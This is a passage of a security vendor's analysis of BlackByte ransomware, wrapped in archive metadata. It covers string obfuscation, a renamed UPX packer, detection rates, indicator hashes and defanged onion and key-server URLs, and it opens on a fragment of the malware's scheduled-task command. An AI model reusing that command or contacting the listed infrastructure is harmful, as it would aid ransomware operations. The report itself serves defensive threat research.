%SystemDrive%\\Program Files\\Windows NT\\Accessories\\WordPad.exe /p\r\nC:\\Users\\1HoWkK.dll\" /st 07:00\r\nAnti-Analysis / Anti-Forensics Techniques\r\nString Obfuscation\r\nBoth Go-based BlackByte variants encrypt most strings using a tool similar to AdvObfuscator. Each string is decrypted\r\nusing a unique algorithm with polymorphic code that implements different operations xor, addition, subtraction, etc. In the\r\nexamples below, the encrypted strings in Figure 13 are built and decrypted from arguments on the stack.\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 17 of 21\n\nFigure 13. BlackByte string obfuscation examples\r\nModified UPX Packer\r\nIn addition to string obfuscation, BlackByte samples are typically packed with UPX. In BlackByte v1, all of the samples\r\nobserved by ThreatLabz were packed with the standard UPX packer and could be unpacked via the command-line parameter\r\n-d. The early samples of BlackByte v2 were also packed with the standard UPX packer. However, the most recent BlackByte\r\nsamples (since March 2022) are packed with a modified version of UPX. The names of the sections have been renamed from\r\nUPX0 and UPX1 to BB0 and BB1, respectively. Figure 14 shows an example BlackByte v2 sample with the modified UPX\r\nheaders.\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 18 of 21\n\nFigure 14. BlackByte v2 altered UPX header\r\nAntivirus Detection\r\nDue to BlackByte's anti-analysis features, polymorphic code, and heavy obfuscation many antivirus products have very low\r\ndetection rates. For example, the BlackByte sample with the\r\nSHA256 534f5fbb7669803812781e43c30083e9197d03f97f0d860ae7d9a59c0484ace4 has an antivirus detection rate of 4/61\r\nat the time of publication.\r\nConclusion\r\nBlackByte is a full-featured ransomware family operated by a threat group that continues to breach organizations and\r\ndemand large ransom amounts. The threat group also performs double extortion attacks by stealing an organization's files\r\nand leaking them online if the ransom is not paid. The ransomware code itself is regularly updated to fix bugs, bypass\r\nsecurity software, and hinder malware analysis. The encryption algorithms have also been improved to be more secure and\r\nprevent file recovery. This demonstrates that the threat group will likely continue to improve the ransomware and remain a\r\nsignificant threat to organizations.\r\nCloud Sandbox Detection\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 19 of 21\n\nZscaler's multilayered cloud security platform detects indicators at various levels, as shown below:\r\nWin64.Ransom.Blackbyte\r\nIndicators of Compromise\r\nIoC Type  Value \r\nBlackByte v1 Packed Sample  1df11bc19aa52b623bdf15380e3fded56d8eb6fb7b53a2240779864b1a6474ad\r\nBlackByte v1 Packed Sample 388163c9ec1458c779849db891e17efb16a941ca598c4c3ac3a50a77086beb69\r\nBlackByte v1 Unpacked Sample 44a5e78fce5455579123af23665262b10165ac710a9f7538b764af76d7771550\r\nBlackByte v1 Unpacked Sample 6f36a4a1364cfb063a0463d9e1287248700ccf1e0d8e280e034b02cf3db3c442\r\nBlackByte v2 Packed Sample ffc4d94a26ea7bcf48baffd96d33d3c3d53df1bb2c59567f6d04e02e7e2e5aaa\r\nBlackByte v2 Packed Sample 9103194d32a15ea9e8ede1c81960a5ba5d21213de55df52a6dac409f2e58bcfe\r\nBlackByte v2 Packed Sample e434ec347a8ea1f0712561bccf0153468a943e16d2cd792fbc72720bd0a8002e\r\nBlackByte v1 Onion URL hxxp://7oukjxwkbnwyg7cekudzp66okrchbuubde2j3h6fkpis6izywoj2eqad.]onion\r\nBlackByte v2 Onion URL hxxp://fyk4jl7jk6viteakzzrxntgzecnz4v6wxaefmbmtmcnscsl3tnwix6yd.]onion\r\nBlackByte v2 Onion URL hxxp://p5quu5ujzzswxv4nxyuhgg3fjj2vy2a3zmtcowalkip2temdfadanlyd.]onion\r\nBlackByte v1 AES Key Seed URL  hxxps://185.93.6[.]31/mountain.png\r\nReferences\r\nhttps://redcanary.com/blog/blackbyte-ransomware/\r\nhttps://www.ic3.gov/Media/News/2022/220211.pdf\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/\r\nhttps://www.bleepingcomputer.com/forums/t/755181/blackbyte-ransomware-blackbyte-support-topic/\r\nExplore more Zscaler blogs\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 20 of 21\n\nZscaler ThreatLabz 2024 Phishing Report\r\nThe Threat Prevention Buyer's Guide\r\nSource: https://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nhttps://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants\r\nPage 21 of 21",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants"
	],
	"report_names": [
		"analysis-blackbyte-ransomwares-go-based-variants"
	],
	"threat_actors": [
		{
			"id": "4e453d66-9ecd-47d9-b63a-32fa5450f071",
			"created_at": "2024-06-19T02:03:08.077075Z",
			"updated_at": "2026-04-10T02:00:03.830523Z",
			"deleted_at": null,
			"main_name": "GOLD LOTUS",
			"aliases": [
				"BlackByte",
				"Hecamede "
			],
			"source_name": "Secureworks:GOLD LOTUS",
			"tools": [
				"BlackByte",
				"Cobalt Strike",
				"ExByte",
				"Mega",
				"RDP",
				"SoftPerfect Network Scanner"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "4e7fd07d-fcc5-459b-b678-45a7d9cda751",
			"created_at": "2025-04-23T02:00:55.174827Z",
			"updated_at": "2026-04-10T02:00:05.353712Z",
			"deleted_at": null,
			"main_name": "BlackByte",
			"aliases": [
				"BlackByte",
				"Hecamede"
			],
			"source_name": "MITRE:BlackByte",
			"tools": [
				"AdFind",
				"BlackByte Ransomware",
				"Exbyte",
				"Arp",
				"BlackByte 2.0 Ransomware",
				"PsExec",
				"Cobalt Strike",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434107,
	"ts_updated_at": 1775791944,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ddb360297952664ea21eeb89f768a4588d2d0625.pdf",
		"text": "https://archive.orkl.eu/ddb360297952664ea21eeb89f768a4588d2d0625.txt",
		"img": "https://archive.orkl.eu/ddb360297952664ea21eeb89f768a4588d2d0625.jpg"
	}
}